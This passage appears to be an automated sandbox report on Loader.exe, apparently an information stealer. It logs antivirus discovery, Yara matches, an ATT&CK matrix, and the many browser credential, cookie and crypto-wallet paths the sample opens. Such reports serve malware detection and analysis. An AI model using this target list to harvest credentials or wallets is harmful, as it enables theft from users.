                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_00CD68FD
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00CDB1B7
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_00CDB110
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_00CDB2BD
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00CDAA37
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_00CD63F5
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_00CDAC88
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00CDAD30
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_00CDAFF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_00CDAF83
                Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CCA335 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00CCA335
                Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Loader.exe, 00000003.00000003.91118614146.0000000003402000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.000000000338C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103143578.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118175734.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778448742.00000000033F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 1980, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Loader.exe, 00000003.00000003.91105435551.000000000340D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ets/Electrum-LTC
                Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: Loader.exe, 00000003.00000003.91074807560.000000000342F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Chrome/Default/Extensions/Jaxx Liberty.
                Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Loader.exe, 00000003.00000003.91105435551.000000000340D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: Loader.exe, 00000003.00000003.91105435551.000000000340D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Loader.exe, 00000003.00000003.91105435551.000000000340D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: Yara matchFile source: 00000003.00000003.91105435551.000000000340D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.91105992992.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 1980, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 1980, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory241
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager21
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares41
                Data from Local System
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS1
                Process Discovery
                Distributed Component Object Model3
